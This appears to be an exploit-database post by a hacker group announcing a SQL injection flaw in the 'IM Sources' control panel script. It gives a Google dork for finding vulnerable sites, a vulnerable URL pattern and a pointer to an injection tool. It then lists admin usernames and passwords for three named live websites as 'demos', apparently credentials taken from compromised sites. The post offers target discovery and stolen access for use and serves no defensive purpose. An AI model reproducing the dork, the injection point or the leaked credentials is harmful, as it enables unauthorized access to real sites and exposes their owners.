id: 19884
date: 12/04/2012
title: IM Sources Control Panel SQL Injection Vulnerability
author: #SOLY
cves: 

------------------------------------------------------------------------------- 
SQL Injection To access the Control Panel Script IM Sources
-------------------------------------------------------------------------------- 

####################################################### 
# Author => Soly Hacler
# Facebook => http://fb.me/vandita.day
# Google Dork => inurl:"Powred By IM Sources''
#Script : IM Sources
# Mail : Mr.Solyhacker@hotmail.com
#######################################################
# Exploit : 
# http://localhost/?route=article/details&cat_id=7&id=27
#note : you can use Fimap :) 
################
#######################################################

# Demo : ( 1 ) http://http://barlaman.net/control
# admin : user :    anc                   pass : admin.w(W!w.^r##r^.cO!o)Om
# Demo  ( 2 ) http://ganatonline.net/control
# admin : user :   admin                  pass : 01091905975lkn
# Demo  ( 3 )  http://ifiponline.com/control
# admin : user :   midoalone              pass : 123456
#######################################################
# Team : Team Hacker egypt 

#  0day.today [2023-03-23]  #